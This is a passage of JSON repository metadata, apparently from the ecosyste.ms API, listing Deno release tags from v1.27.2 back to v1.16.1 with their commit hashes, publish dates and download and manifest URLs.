url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2/manifests"},{"name":"v1.27.1","sha":"d448c2950db2ed474405ace6a0a180301eeaa68d","kind":"commit","published_at":"2022-11-03T21:52:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1/manifests"},{"name":"v1.27.0","sha":"b0fb8fa9dc08640e77eb0ab888a483db18a52a4b","kind":"commit","published_at":"2022-10-27T15:13:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0/manifests"},{"name":"v1.26.2","sha":"d1f432bf12e5de645d45f1f2738a53981f39fa5b","kind":"commit","published_at":"2022-10-17T18:51:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2/manifests"},{"name":"v1.26.1","sha":"753b60dd9b0c9bb5220609f2fe65ad06957690d6","kind":"commit","published_at":"2022-10-06T17:16:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1/manifests"},{"name":"v1.26.0","sha":"d8827514ffef04c2e1732f7033ff6a374dd94d54","kind":"commit","published_at":"2022-09-28T22:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0/manifests"},{"name":"v1.25.4","sha":"02afbe2af550ad5223d982e8fdd37f778b9d828c","kind":"commit","published_at":"2022-09-22T18:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4/manifests"},{"name":"v1.25.3","sha":"f561e765a75c749f1d1e2d6584edf6018435e6e1","kind":"commit","published_at":"2022-09-15T17:46:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3/manifests"},{"name":"v1.25.2","sha":"3c5af2ba495b2d5770b3f5ed12e202ba2089ebda","kind":"commit","published_at":"2022-09-09T08:54:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2/manifests"},{"name":"v1.25.1","sha":"1e78804d5c0b8204978dd77431ac33d8d16ce5bc","kind":"commit","published_at":"2022-09-02T00:07:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1/manifests"},{"name":"v1.25.0","sha":"8986e2ced4adbf6185aea02a580036aa92c2872c","kind":"commit","published_at":"2022-08-24T22:20:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0/manifests"},{"name":"v1.24.3","sha":"c79127061438234a60f63cf9d0a276328961f971","kind":"commit","published_at":"2022-08-11T18:38:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3/manifests"},{"name":"v1.24.2","sha":"44ade24fb213875814c431c87abb3f79ecab1fef","kind":"commit","published_at":"2022-08-04T20:49:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2/manifests"},{"name":"v1.24.1","sha":"fa9698fe9ec3ceb660c1865eb75f07a0bc5b90c5","kind":"commit","published_at":"2022-07-28T17:22:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1/manifests"},{"name":"v1.24.0","sha":"f0e01682cce638303e3b6997788667a0f71dff8d","kind":"commit","published_at":"2022-07-20T23:28:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0/manifests"},{"name":"v1.23.4","sha":"b0de3031dcfe6eab1156a2546b996005d1c07cfe","kind":"commit","published_at":"2022-07-12T18:55:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4/manifests"},{"name":"v1.23.3","sha":"0b07d1a40318147ec0782af9fe99048d5ef80984","kind":"commit","published_at":"2022-07-05T17:00:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3/manifests"},{"name":"v1.23.2","sha":"5a5d3084ab0f20c511a70a1f2e12ef7bdd184ec2","kind":"commit","published_at":"2022-06-30T19:31:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2/manifests"},{"name":"v1.23.1","sha":"9f9941c03b942469fb651477503f8cd19f18a1ab","kind":"commit","published_at":"2022-06-23T19:50:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1/manifests"},{"name":"v1.23.0","sha":"e7ea4edc8a1a4fc339ac2267d9512a9374bc2ce5","kind":"commit","published_at":"2022-06-15T23:02:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0/manifests"},{"name":"v1.22.3","sha":"43e7c5d328a5a17a8c33362caf642d6ded49f179","kind":"commit","published_at":"2022-06-09T18:55:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3/manifests"},{"name":"v1.22.2","sha":"783f7661ef74a56dcc8a3a382adc8cf559ec75e5","kind":"commit","published_at":"2022-06-02T17:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2/manifests"},{"name":"v1.22.1","sha":"6a7151539737e4abe1b12095c9e1bc3ed9376f48","kind":"commit","published_at":"2022-05-27T04:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1/manifests"},{"name":"v1.22.0","sha":"5ad8919d642b646caa3328930dd1a3f290bc587e","kind":"commit","published_at":"2022-05-18T15:05:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0/manifests"},{"name":"v1.21.3","sha":"d14b77b58e3598ea28712473ea832e22070940ca","kind":"commit","published_at":"2022-05-12T14:14:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3/manifests"},{"name":"v1.21.2","sha":"2256c697aedc2d2d2d856a4faa0816521a02692a","kind":"commit","published_at":"2022-05-05T20:56:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2/manifests"},{"name":"v1.21.1","sha":"58bedd8d8422cf0ef6f9a581b188055a74cd9304","kind":"commit","published_at":"2022-04-28T20:33:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1/manifests"},{"name":"v1.21.0","sha":"29c8cd8aae52b89075e6af84ddd34f813fa3ea8d","kind":"commit","published_at":"2022-04-21T01:50:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0/manifests"},{"name":"v1.20.6","sha":"3ad1535e48505af3129c133408b496fa8eb7569c","kind":"commit","published_at":"2022-04-14T18:56:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6/manifests"},{"name":"v1.20.5","sha":"d2c09408380191721ba7dfd971f802f5639eb1f7","kind":"commit","published_at":"2022-04-07T16:38:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5/manifests"},{"name":"v1.20.4","sha":"a78f728a10bd2c0c3d61f91518dcb053ac53b13b","kind":"commit","published_at":"2022-03-31T17:09:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4/manifests"},{"name":"v1.20.3","sha":"347da0d1174a685ad1a9445cc8c681677115731f","kind":"commit","published_at":"2022-03-25T15:22:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3/manifests"},{"name":"v1.20.2","sha":"1be60627d857d788061204eaf7ed6667f7bf0eee","kind":"commit","published_at":"2022-03-24T02:39:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2/manifests"},{"name":"v1.20.1","sha":"fce60f2cc20bda8403fc7577c086759744314561","kind":"commit","published_at":"2022-03-17T01:40:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1/manifests"},{"name":"v1.20.0","sha":"418c1eb4b3d65a9573030a074170a344723608de","kind":"commit","published_at":"2022-03-16T20:07:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0/manifests"},{"name":"v1.19.3","sha":"d6877e941cf270964015b86abae70b34febbef56","kind":"commit","published_at":"2022-03-10T11:22:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3/manifests"},{"name":"v1.19.2","sha":"84f9a2550369e3f5132ab2ab9f274f76f7db3a90","kind":"commit","published_at":"2022-03-03T16:53:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2/manifests"},{"name":"v1.19.1","sha":"8eb3f5f377fe278aec5039c259380f6ca8edadb8","kind":"commit","published_at":"2022-02-24T20:29:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1/manifests"},{"name":"v1.19.0","sha":"551ace40cc513403a6a0cfd21304a2f9a1db7ece","kind":"commit","published_at":"2022-02-17T00:54:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0/manifests"},{"name":"v1.18.2","sha":"ac4311880fd59383e1408647581cf996fb53fec9","kind":"commit","published_at":"2022-02-04T00:07:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2/manifests"},{"name":"v1.18.1","sha":"0c931060784ee83082f7c221374aed451d4f1ad6","kind":"commit","published_at":"2022-01-27T16:33:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1/manifests"},{"name":"v1.18.0","sha":"2ea535c8c1817a20a3915e350242423ee71cfa73","kind":"commit","published_at":"2022-01-20T16:19:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0/manifests"},{"name":"v1.17.3","sha":"df5fe5a35f8ace40275a822927f3385c828beba7","kind":"commit","published_at":"2022-01-12T16:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3/manifests"},{"name":"v1.17.2","sha":"ad4a07789441097ca477ebf796c31823b422db7a","kind":"commit","published_at":"2022-01-05T17:22:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2/manifests"},{"name":"v1.17.1","sha":"ded77918fbd324c6d4038127bfce60380d56397d","kind":"commit","published_at":"2021-12-22T17:48:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1/manifests"},{"name":"v1.17.0","sha":"5f11f87495effaf9b4ce6c8c615cdce3d50d91f8","kind":"commit","published_at":"2021-12-16T18:24:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0/manifests"},{"name":"v1.16.4","sha":"ab286750a8c87215a9651efb11fcc620f2914005","kind":"commit","published_at":"2021-12-03T18:43:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4/manifests"},{"name":"v1.16.3","sha":"bfa2f30529921155551e8b288bcda1e01c468b79","kind":"tag","published_at":"2021-11-24T23:06:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3/manifests"},{"name":"v1.16.2","sha":"4836ab769c00c83b7c5488c4d9c5f185be858e70","kind":"commit","published_at":"2021-11-17T16:00:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2/manifests"},{"name":"v1.16.1","sha":"fdf890a68d3d54